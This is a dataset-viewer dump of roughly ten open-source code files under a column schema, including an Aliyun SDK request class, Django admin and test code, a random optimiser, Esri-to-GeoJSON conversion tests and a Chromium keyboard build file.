blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
afe3e972640f342df29ec41f8483b6b5ac8b87da | 83de24182a7af33c43ee340b57755e73275149ae | /aliyun-python-sdk-alb/aliyunsdkalb/request/v20200616/UpdateAScriptsRequest.py | 0483ef14f68504f3e2d37de9657b8163fe62ec2d | [
"Apache-2.0"
] | permissive | aliyun/aliyun-openapi-python-sdk | 4436ca6c57190ceadbc80f0b1c35b1ab13c00c7f | 83fd547946fd6772cf26f338d9653f4316c81d3c | refs/heads/master | 2023-08-04T12:32:57.028821 | 2023-08-04T06:00:29 | 2023-08-04T06:00:29 | 39,558,861 | 1,080 | 721 | NOASSERTION | 2023-09-14T08:51:06 | 2015-07-23T09:39:45 | Python | UTF-8 | Python | false | false | 3,065 | py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkalb.endpoint import endpoint_data
class UpdateAScriptsRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Alb', '2020-06-16', 'UpdateAScripts','alb')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ClientToken(self): # String
return self.get_query_params().get('ClientToken')
def set_ClientToken(self, ClientToken): # String
self.add_query_param('ClientToken', ClientToken)
def get_AScripts(self): # Array
return self.get_query_params().get('AScripts')
def set_AScripts(self, AScripts): # Array
for index1, value1 in enumerate(AScripts):
if value1.get('AScriptName') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.AScriptName', value1.get('AScriptName'))
if value1.get('AScriptId') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.AScriptId', value1.get('AScriptId'))
if value1.get('ExtAttributeEnabled') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.ExtAttributeEnabled', value1.get('ExtAttributeEnabled'))
if value1.get('ScriptContent') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.ScriptContent', value1.get('ScriptContent'))
if value1.get('ExtAttributes') is not None:
for index2, value2 in enumerate(value1.get('ExtAttributes')):
if value2.get('AttributeValue') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.ExtAttributes.' + str(index2 + 1) + '.AttributeValue', value2.get('AttributeValue'))
if value2.get('AttributeKey') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.ExtAttributes.' + str(index2 + 1) + '.AttributeKey', value2.get('AttributeKey'))
if value1.get('Enabled') is not None:
self.add_query_param('AScripts.' + str(index1 + 1) + '.Enabled', value1.get('Enabled'))
def get_DryRun(self): # Boolean
return self.get_query_params().get('DryRun')
def set_DryRun(self, DryRun): # Boolean
self.add_query_param('DryRun', DryRun)
| [
"[email protected]"
] | |
22e9a901d92d103f5fa559120bb1832bbb4c64bb | 39d8ccea8f164bb25240b7b2ec82d7027bab2e52 | /venv/bin/markdown_py | 87d786275b88bdb478b0ff94eb7bfb860b6eaf86 | [] | no_license | yasin007/YYShop | 63b4cf6b5c285f78b63dd49c0946f9928dc43fea | f2159ab8da11b54e5c224ae2f9b79cee81a67d86 | refs/heads/master | 2020-04-04T00:22:31.373194 | 2018-11-01T02:02:16 | 2018-11-01T02:02:16 | 155,647,960 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 246 | #!/Users/yiyang/Desktop/YYShop/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from markdown.__main__ import run
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(run())
| [
"[email protected]"
] | ||
1970f69d158e97061c73bbe3e05ddb5331a5e538 | 3f62939fc249b544302dc0b57923c9b7f35fcd30 | /blog_agro/venv/bin/django-admin.py | dfa7a06f79ee8aba20f9614452a00f56b7c977c6 | [] | no_license | marri88/rest-framework-base | 5c3ba789bfa6089a09dc4564ad83aeb92bc140c3 | 197de7e4e791329b6286436afabf7f6e1bb80297 | refs/heads/master | 2023-06-27T18:42:56.659416 | 2021-07-30T15:06:12 | 2021-07-30T15:06:12 | 391,104,171 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | #!/home/aimira/Pycharm/blog_agro/venv/bin/python
# When the django-admin.py deprecation ends, remove this script.
import warnings
from django.core import management
try:
from django.utils.deprecation import RemovedInDjango40Warning
except ImportError:
raise ImportError(
'django-admin.py was deprecated in Django 3.1 and removed in Django '
'4.0. Please manually remove this script from your virtual environment '
'and use django-admin instead.'
)
if __name__ == "__main__":
warnings.warn(
'django-admin.py is deprecated in favor of django-admin.',
RemovedInDjango40Warning,
)
management.execute_from_command_line()
| [
"[email protected]"
] | |
022010ca59bb2656af4a763f8213b6c1192ebf1b | 4a0cff7421d20c0826c38f40a7d30a298cdaf23b | /app/users/admin.py | 86ce6ae20b4f28dc77a2a1401e6c91bf50124ad4 | [
"MIT"
] | permissive | contestcrew/2019SeoulContest-Backend | 0699dea624386f05526e8b5f3c295839f58f3d05 | 2e99cc6ec6a712911da3b79412ae84a9d35453e1 | refs/heads/master | 2021-09-09T10:48:01.214064 | 2019-09-30T06:39:58 | 2019-09-30T06:39:58 | 205,388,431 | 0 | 3 | MIT | 2021-06-10T19:07:57 | 2019-08-30T13:31:53 | Python | UTF-8 | Python | false | false | 271 | py | from django.contrib import admin
from .models import User
class UserAdmin(admin.ModelAdmin):
list_display = ["id", "username", "is_staff", "date_joined"]
search_fields = ["username"]
ordering = ["-id", "date_joined"]
admin.site.register(User, UserAdmin)
| [
"[email protected]"
] | |
aa65658df4f8fc95e1ef9915be1117aaa44c049c | b76384bdcf39605ace17ee51c7902743cb315a00 | /opt/random_optimiser.py | b714186e31d9b24ce2b148f18caa5544bbd1cec0 | [
"MIT"
] | permissive | RemiLehe/dragonfly | c13c54ad106edb4de8f46c8adc44052f926d3685 | 950bee976b8dc5157e84236ce6fd3d4ec5612521 | refs/heads/master | 2022-08-15T05:04:57.176391 | 2018-09-08T01:05:33 | 2018-09-08T01:05:33 | 148,205,116 | 1 | 0 | MIT | 2018-09-10T19:04:34 | 2018-09-10T19:04:33 | null | UTF-8 | Python | false | false | 7,013 | py | """
Implements some instances of a random optimiser.
-- [email protected]
"""
# pylint: disable=invalid-name
from argparse import Namespace
import numpy as np
# Local imports
import exd.domains as domains
from exd.exd_utils import get_euclidean_initial_qinfos
from exd.exd_core import mf_exd_args
from opt.blackbox_optimiser import BlackboxOptimiser, blackbox_opt_args, \
CalledMFOptimiserWithSFCaller
from utils.option_handler import load_options
from utils.reporters import get_reporter
from utils.general_utils import map_to_bounds
random_optimiser_args = blackbox_opt_args
euclidean_random_optimiser_args = random_optimiser_args
mf_euclidean_random_optimiser_args = euclidean_random_optimiser_args + mf_exd_args
# Base class for Random Optimisation -----------------------------------------------
class RandomOptimiser(BlackboxOptimiser):
""" A class which optimises using random evaluations. """
#pylint: disable=attribute-defined-outside-init
#pylint: disable=abstract-method
# Constructor.
def __init__(self, func_caller, worker_manager, options=None, reporter=None):
""" Constructor. """
self.reporter = get_reporter(reporter)
if options is None:
options = load_options(random_optimiser_args, reporter=reporter)
super(RandomOptimiser, self).__init__(func_caller, worker_manager, model=None,
options=options, reporter=self.reporter)
def _opt_method_set_up(self):
""" Any set up specific to otptimisation. """
pass
def _get_method_str(self):
""" Returns a string describing the method. """
return 'rand'
def _add_data_to_model(self, qinfos):
""" Adds data to model. """
pass
def _child_build_new_model(self):
""" Builds a new model. """
pass
# Random optimiser for Euclidean spaces --------------------------------------------
class EuclideanRandomOptimiser(RandomOptimiser):
""" A class which optimises in Euclidean spaces using random evaluations. """
def is_an_mf_method(self):
""" Returns False since this is not a MF method. """
return False
def _determine_next_query(self):
""" Determines the next query. """
qinfo = Namespace(point=map_to_bounds(np.random.random(self.domain.dim),
self.domain.bounds))
return qinfo
def _determine_next_batch_of_queries(self, batch_size):
""" Determines the next batch of queries. """
qinfos = [self._determine_next_query() for _ in range(batch_size)]
return qinfos
def _get_initial_qinfos(self, num_init_evals):
""" Returns initial qinfos. """
return get_euclidean_initial_qinfos(self.options.init_method, num_init_evals,
self.domain.bounds)
# Multi-fidelity Random Optimiser for Euclidean Spaces -------------------------------
class MFEuclideanRandomOptimiser(RandomOptimiser):
""" A class which optimises in Euclidean spaces using random evaluations and
multi-fidelity.
"""
def is_an_mf_method(self):
""" Returns Truee since this is a MF method. """
return True
# Constructor.
def __init__(self, func_caller, worker_manager, call_fidel_to_opt_prob=0.25,
*args, **kwargs):
""" Constructor.
call_fidel_to_opt_prob is the probability with which we will choose
fidel_to_opt as the fidel.
"""
super(MFEuclideanRandomOptimiser, self).__init__(func_caller, worker_manager,
*args, **kwargs)
self.call_fidel_to_opt_prob = call_fidel_to_opt_prob
if not func_caller.is_mf():
raise CalledMFOptimiserWithSFCaller(self, func_caller)
def _determine_next_query(self):
""" Determines the next query. """
# An internal function which returns the next fidelity.
def _get_next_fidel():
""" Returns the next fidelity. """
if np.random.random() <= self.call_fidel_to_opt_prob:
return self.func_caller.fidel_to_opt
else:
return np.random.random(self.fidel_space.dim)
# Create and return qinfo
qinfo = Namespace(point=np.random.random(self.domain.dim),
fidel=_get_next_fidel())
return qinfo
def _determine_next_batch_of_queries(self, batch_size):
""" Determines the next batch of queries. """
qinfos = [self._determine_next_query() for _ in range(batch_size)]
return qinfos
def _get_initial_qinfos(self, num_init_evals):
""" Returns initial qinfos. """
return get_euclidean_initial_qinfos(self.options.init_method, num_init_evals,
self.domain.bounds, self.options.fidel_init_method, self.fidel_space.bounds,
self.func_caller.fidel_to_opt,
self.options.init_set_to_fidel_to_opt_with_prob)
# APIs for random optimisation ===========================================================
# An API for single fidelity optimisation
def random_optimiser_from_func_caller(func_caller, worker_manager, max_capital, mode,
options=None, reporter='default'):
""" Creates a EuclideanRandomOptimiser Object and optimises the function. """
reporter = get_reporter(reporter)
if isinstance(func_caller.domain, domains.EuclideanDomain):
optimiser_constructor = EuclideanRandomOptimiser
dflt_list_of_options = euclidean_random_optimiser_args
else:
raise ValueError('Random optimiser not implemented for domain of type %s.'%(
type(func_caller.domain)))
# Load options
if options is None:
options = load_options(dflt_list_of_options)
options.mode = mode
# Create optimiser
optimiser = optimiser_constructor(func_caller, worker_manager, options, reporter)
# optimise and return
return optimiser.optimise(max_capital)
# An API for multi-fidelity optimisation
def mf_random_optimiser_from_func_caller(func_caller, worker_manager, max_capital, mode,
options=None, reporter='default',
*args, **kwargs):
""" Creates a MF EuclideanRandomOptimiser Object and optimises the function. """
reporter = get_reporter(reporter)
if isinstance(func_caller.domain, domains.EuclideanDomain) and \
isinstance(func_caller.fidel_space, domains.EuclideanDomain):
optimiser_constructor = MFEuclideanRandomOptimiser
dflt_list_of_options = mf_euclidean_random_optimiser_args
else:
raise ValueError(('MF Random optimiser not implemented for (domain, fidel_space) '
+ 'of types (%s, %s).')%(
type(func_caller.domain), type(func_caller.fidel_space)))
# Load options
if options is None:
options = load_options(dflt_list_of_options)
options.mode = mode
# Create optimiser
optimiser = optimiser_constructor(func_caller, worker_manager, options=options,
reporter=reporter, *args, **kwargs)
# optimise and return
return optimiser.optimise(max_capital)
| [
"[email protected]"
] | |
ae395a7c4ec0756abf0ced1656e481bec76d45f8 | fd3c7bf3d070ac6da0df9c6aeb6d8f9d45a3112f | /tests/esrijson_tests.py | 809ee3500b1a0658cf6222cf7f594cc27189d5ae | [
"MIT"
] | permissive | loveland/pyesridump | 3c4c020c18716b9b250faa98039fef4d3e745edc | 089767147b451e47a7285ca082ec4f02081c632d | refs/heads/master | 2020-03-26T09:04:48.403060 | 2018-12-12T21:49:12 | 2018-12-12T21:49:12 | 144,734,493 | 1 | 0 | MIT | 2018-12-12T21:49:14 | 2018-08-14T14:52:18 | Python | UTF-8 | Python | false | false | 16,909 | py | import unittest
from esridump import esri2geojson
class TestEsriJsonToGeoJson(unittest.TestCase):
def setUp(self):
self.maxDiff = None
def assertEsriJsonBecomesGeoJson(self, esrijson, geojson):
out_json = esri2geojson(esrijson)
self.assertDictEqual(out_json, geojson)
class TestGeoJsonPointConversion(TestEsriJsonToGeoJson):
def test_point(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"x": 496814.6,
"y": 265006.2
},
"attributes": None
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "Point",
"coordinates": [496814.6, 265006.2],
}
}
)
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"points": [
[496814.6, 265006.2],
]
},
"attributes": None
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "Point",
"coordinates": [496814.6, 265006.2],
}
}
)
def test_multi_point(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"points": [
[41.83, 71.01],
[56.95, 33.75],
[21.79, 36.56]
],
},
"attributes": None
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "MultiPoint",
"coordinates": [
[41.83, 71.01],
[56.95, 33.75],
[21.79, 36.56]
]
}
}
)
def test_empty_point(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"x": None,
},
},
{
"type": "Feature",
"properties": None,
"geometry": None
}
)
class TestGeoJsonLinestringConversion(TestEsriJsonToGeoJson):
def test_linestring(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"paths" : [
[[-97.06138,32.837], [-97.06133,32.836], [-97.06124,32.834], [-97.06127,32.832]]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "LineString",
"coordinates": [
[-97.06138,32.837], [-97.06133,32.836], [-97.06124,32.834], [-97.06127,32.832]
],
}
}
)
def test_multi_linestring(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"paths" : [
[[-97.06138,32.837], [-97.06133,32.836], [-97.06124,32.834], [-97.06127,32.832]],
[[-97.06326,32.759], [-97.06298,32.755]]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "MultiLineString",
"coordinates": [
[ [-97.06138,32.837], [-97.06133,32.836], [-97.06124,32.834], [-97.06127,32.832] ],
[ [-97.06326,32.759], [-97.06298,32.755] ]
],
}
}
)
def test_real_linstring(self):
self.assertEsriJsonBecomesGeoJson(
{
"attributes": {
"objectid":187,
"st_length(shape)":1322.4896687156252
},
"geometry":{
"paths":[
[[-95.42428663740543,39.743798710848658],[-95.424285648691338,39.744302699946864],[-95.424279518608387,39.747429247542691]]
]
}
},
{
"type": "Feature",
"properties": {
"objectid": 187,
"st_length(shape)": 1322.4896687156252
},
"geometry": {
"type": "LineString",
"coordinates": [
[-95.42428663740543, 39.74379871084866], [-95.42428564869134, 39.744302699946864], [-95.42427951860839, 39.74742924754269]
]
}
}
)
class TestGeoJsonPolygonConversion(TestEsriJsonToGeoJson):
def test_polygon(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "Polygon",
"coordinates": [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
]
],
}
}
)
def test_polygon_with_hole(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
],
[
[2,2],
[3,2],
[3,3],
[2,3],
[2,2]
]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "Polygon",
"coordinates": [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
],
[
[2,2],
[3,2],
[3,3],
[2,3],
[2,2]
]
],
}
}
)
def test_polygon_close(self):
# Esri-JSON allows polygons that aren't closed. GeoJSON requires them to be closed.
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [
[
[1,1],
[1,4],
[4,4],
[4,1]
]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "Polygon",
"coordinates": [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
]
],
}
}
)
def test_polygon_strip_invalid_rings(self):
# Esri JSON allows rings with three points (A-B-A) that are essentially lines. GeoJSON doesn't.
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [
[
[1,1],
[1,4],
[4,4],
[4,1]
],
[
[1,1],
[1,4],
[1,1]
]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "Polygon",
"coordinates": [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
]
],
}
}
)
def test_ring_is_clockwise(self):
from esridump.esri2geojson import ring_is_clockwise
self.assertFalse(ring_is_clockwise(
[[-86.3393396, 33.9767272], [-86.3392317, 33.9767215], [-86.3391237, 33.9767234], [-86.3392317, 33.9767215], [-86.3393396, 33.9767272]]
))
self.assertTrue(ring_is_clockwise(
[[-86.3394465, 33.9767405], [-86.3393396, 33.9767272], [-86.3394465, 33.9767405], [-86.3395516, 33.9767613], [-86.3394465, 33.9767405]]
))
def test_skip_bad_ring(self):
self.assertEsriJsonBecomesGeoJson(
{
'geometry': {
'rings': [
[[-86.3393396, 33.9767272], [-86.3392317, 33.9767215], [-86.3391237, 33.9767234], [-86.3392317, 33.9767215], [-86.3393396, 33.9767272]],
[[-86.3394465, 33.9767405], [-86.3393396, 33.9767272], [-86.3394465, 33.9767405], [-86.3395516, 33.9767613], [-86.3394465, 33.9767405]],
[[-86.3385404, 33.9768611], [-86.3385637, 33.9768556], [-86.3385404, 33.9768611], [-86.3385047, 33.9768669], [-86.3384686, 33.9768702], [-86.3385047, 33.9768669], [-86.3385404, 33.9768611]],
[[-86.3373056, 33.9769147], [-86.3373895, 33.9768781], [-86.3373056, 33.9769147], [-86.3372257, 33.9769572], [-86.3373056, 33.9769147]],
[[-86.3383601, 33.9768650], [-86.3383248, 33.9768582], [-86.3382902, 33.9768490], [-86.3383248, 33.9768582], [-86.3383601, 33.9768650]],
[[-86.3413982, 33.9774822], [-86.3413947, 33.9774828], [-86.3413947, 33.9774828], [-86.3413982, 33.9774822]]
]
},
'attributes': {}
},
{
'type': 'Feature',
'geometry': {
'type': 'MultiPolygon',
'coordinates': [
[
[[-86.3394465, 33.9767405], [-86.3393396, 33.9767272], [-86.3394465, 33.9767405], [-86.3395516, 33.9767613], [-86.3394465, 33.9767405]],
[[-86.3385404, 33.9768611], [-86.3385637, 33.9768556], [-86.3385404, 33.9768611], [-86.3385047, 33.9768669], [-86.3384686, 33.9768702], [-86.3385047, 33.9768669], [-86.3385404, 33.9768611]],
],
[
[[-86.3373056, 33.9769147], [-86.3373895, 33.9768781], [-86.3373056, 33.9769147], [-86.3372257, 33.9769572], [-86.3373056, 33.9769147]],
[[-86.3383601, 33.9768650], [-86.3383248, 33.9768582], [-86.3382902, 33.9768490], [-86.3383248, 33.9768582], [-86.3383601, 33.9768650]],
],
[
[[-86.3413982, 33.9774822], [-86.3413947, 33.9774828], [-86.3413947, 33.9774828], [-86.3413982, 33.9774822]]
],
]
},
'properties': None
}
)
def test_multi_polygon(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
],
[
[2,2],
[3,2],
[3,3],
[2,3],
[2,2]
],
[
[5,1],
[5,4],
[8,4],
[8,1],
[5,1]
]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "MultiPolygon",
"coordinates": [
[
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
],
[
[2,2],
[3,2],
[3,3],
[2,3],
[2,2]
]
],
[
[
[5,1],
[5,4],
[8,4],
[8,1],
[5,1]
]
]
],
}
}
)
def test_multi_polygon_close(self):
# We should close the rings of a multipolygon if they aren't closed already
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [
[
[1,1],
[1,4],
[4,4],
[4,1]
],
[
[2,2],
[3,2],
[3,3],
[2,3],
[2,2]
],
[
[5,1],
[5,4],
[8,4],
[8,1]
]
],
}
},
{
"type": "Feature",
"properties": None,
"geometry": {
"type": "MultiPolygon",
"coordinates": [
[
[
[1,1],
[1,4],
[4,4],
[4,1],
[1,1]
],
[
[2,2],
[3,2],
[3,3],
[2,3],
[2,2]
]
],
[
[
[5,1],
[5,4],
[8,4],
[8,1],
[5,1]
]
]
],
}
}
)
def test_empty_polygon(self):
self.assertEsriJsonBecomesGeoJson(
{
"geometry": {
"rings" : [ ]
},
},
{
"type": "Feature",
"properties": None,
"geometry": None
}
)
| [
"[email protected]"
] | |
659da2ed1830691916e79d88dcff073d2175e3ab | 9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97 | /sdBs/HundredRun/KUV_00486-2016/sdB_KUV_00486-2016_lc.py | b02b47a0574e563b9801476c5c5d0b466ad7622c | [] | no_license | tboudreaux/SummerSTScICode | 73b2e5839b10c0bf733808f4316d34be91c5a3bd | 4dd1ffbb09e0a599257d21872f9d62b5420028b0 | refs/heads/master | 2021-01-20T18:07:44.723496 | 2016-08-08T16:49:53 | 2016-08-08T16:49:53 | 65,221,159 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 352 | py | from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[191.49438,-19.999389], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_KUV_00486-2016 /sdB_KUV_00486-2016_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
bf9a250bb60d5bd8acf6f007ac45e93468b1b0e2 | 2e8d5422aba03edc10154225db2fc39af5e98660 | /Code/NativePython/GPUCommandList.py | 2ba28c79817a35025ab9d8e97f51defbb8806e0e | [
"MIT"
] | permissive | MYheavyGo/RenderPipeline | f500611bef020f45ac63023df206f978be887fc5 | 70002e71c25ba93f05c73d041943d07eb639641c | refs/heads/master | 2021-01-15T14:49:58.756014 | 2016-01-18T15:59:14 | 2016-01-18T15:59:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,638 | py | """
RenderPipeline
Copyright (c) 2014-2015 tobspr <[email protected]>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
class GPUCommandList(object):
def __init__(self):
self._commands = []
def add_command(self, cmd):
self._commands.append(cmd)
def get_num_commands(self):
return len(self._commands)
def write_commands_to(self, dest, limit=32):
num_commands_written = 0
while num_commands_written < limit and self._commands:
self._commands.pop(0).write_to(dest, num_commands_written)
num_commands_written += 1
return num_commands_written
| [
"[email protected]"
] | |
548d1a106183486e625e18b56894ddc4126ea39c | dd80a584130ef1a0333429ba76c1cee0eb40df73 | /external/chromium_org/ui/keyboard/keyboard.gyp | 4ea3b09808b9285366865be616e0eb9ecf06483b | [
"MIT",
"BSD-3-Clause"
] | permissive | karunmatharu/Android-4.4-Pay-by-Data | 466f4e169ede13c5835424c78e8c30ce58f885c1 | fcb778e92d4aad525ef7a995660580f948d40bc9 | refs/heads/master | 2021-03-24T13:33:01.721868 | 2017-02-18T17:48:49 | 2017-02-18T17:48:49 | 81,847,777 | 0 | 2 | MIT | 2020-03-09T00:02:12 | 2017-02-13T16:47:00 | null | UTF-8 | Python | false | false | 3,341 | gyp | # Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'targets': [
{
'target_name': 'keyboard_resources',
'type': 'none',
'variables': {
'grit_out_dir': '<(SHARED_INTERMEDIATE_DIR)/ui/keyboard',
},
'actions': [
{
'action_name': 'keyboard_resources',
'variables': {
'grit_grd_file': 'keyboard_resources.grd',
},
'includes': [ '../../build/grit_action.gypi' ],
},
],
'includes': [ '../../build/grit_target.gypi' ],
'copies': [
{
'destination': '<(PRODUCT_DIR)',
'files': [
'<(SHARED_INTERMEDIATE_DIR)/ui/keyboard/keyboard_resources.pak',
],
},
],
},
{
'target_name': 'keyboard',
'type': '<(component)',
'dependencies': [
'../../base/base.gyp:base',
'../../base/third_party/dynamic_annotations/dynamic_annotations.gyp:dynamic_annotations',
'../../content/content.gyp:content_browser',
'../../ipc/ipc.gyp:ipc',
'../../skia/skia.gyp:skia',
'../../url/url.gyp:url_lib',
'../aura/aura.gyp:aura',
'../compositor/compositor.gyp:compositor',
'../events/events.gyp:events',
'../gfx/gfx.gyp:gfx',
'../ui.gyp:ui',
'keyboard_resources',
],
'defines': [
'KEYBOARD_IMPLEMENTATION',
],
'sources': [
'keyboard.cc',
'keyboard.h',
'keyboard_constants.cc',
'keyboard_constants.h',
'keyboard_controller.cc',
'keyboard_controller.h',
'keyboard_controller_observer.h',
'keyboard_controller_proxy.cc',
'keyboard_controller_proxy.h',
'keyboard_export.h',
'keyboard_switches.cc',
'keyboard_switches.h',
'keyboard_ui_controller.cc',
'keyboard_ui_controller.h',
'keyboard_ui_handler.cc',
'keyboard_ui_handler.h',
'keyboard_util.cc',
'keyboard_util.h',
]
},
{
'target_name': 'keyboard_unittests',
'type': '<(gtest_target_type)',
'dependencies': [
'../../base/base.gyp:base',
'../../base/base.gyp:test_support_base',
'../../content/content.gyp:content',
'../../skia/skia.gyp:skia',
'../../testing/gtest.gyp:gtest',
'../../url/url.gyp:url_lib',
'../aura/aura.gyp:aura',
'../aura/aura.gyp:aura_test_support',
'../compositor/compositor.gyp:compositor',
'../gfx/gfx.gyp:gfx',
'../ui.gyp:ui',
'../ui_unittests.gyp:run_ui_unittests',
'keyboard',
],
'sources': [
'keyboard_controller_unittest.cc',
],
'conditions': [
['OS=="linux" and linux_use_tcmalloc==1', {
'dependencies': [
'<(DEPTH)/base/allocator/allocator.gyp:allocator',
],
'link_settings': {
'ldflags': ['-rdynamic'],
},
}],
['OS=="win" and win_use_allocator_shim==1', {
'dependencies': [
'<(DEPTH)/base/allocator/allocator.gyp:allocator',
],
}],
],
},
],
}
| [
"[email protected]"
] | |
a9d82f50c1dec7b4eb3ff66f299c04a27101aa6f | 6300fcf67d4fcb5387a9f0f7370a8ffe8f4097d9 | /AutoParts/Tests/base/mixins.py | 35bd3b4584f9a55e5747260ca009f68451a98241 | [] | no_license | Borislav-source/Final-Project | e34ac1cbb71e3a32ed490361d3583c2e1e8bfbc9 | 501b258d103c2e1b8947451f4bdf750709d040fd | refs/heads/master | 2023-07-17T15:03:19.390774 | 2021-09-01T14:06:09 | 2021-09-01T14:06:09 | 393,977,540 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 598 | py | from django.utils.timezone import now
from AutoParts.accounts.models import Profile
from AutoParts.vehicle.models import EngineModel, Manufacturer, VehicleModels, Vehicle
class ProfileWithCarMixin:
engine = EngineModel.objects.create(engine='1.8t')
vehicle_manufacturer = Manufacturer.objects.create(name='Mercedes')
vehicle_model = VehicleModels.objects.create(name='C-class', engine=engine, production_date=now())
vehicle = Vehicle.objects.create(manufacturer=vehicle_manufacturer, vehicle_type='Car', model=vehicle_model)
def tearDown(self):
self.vehicle.delete()
| [
"[email protected]"
] | |
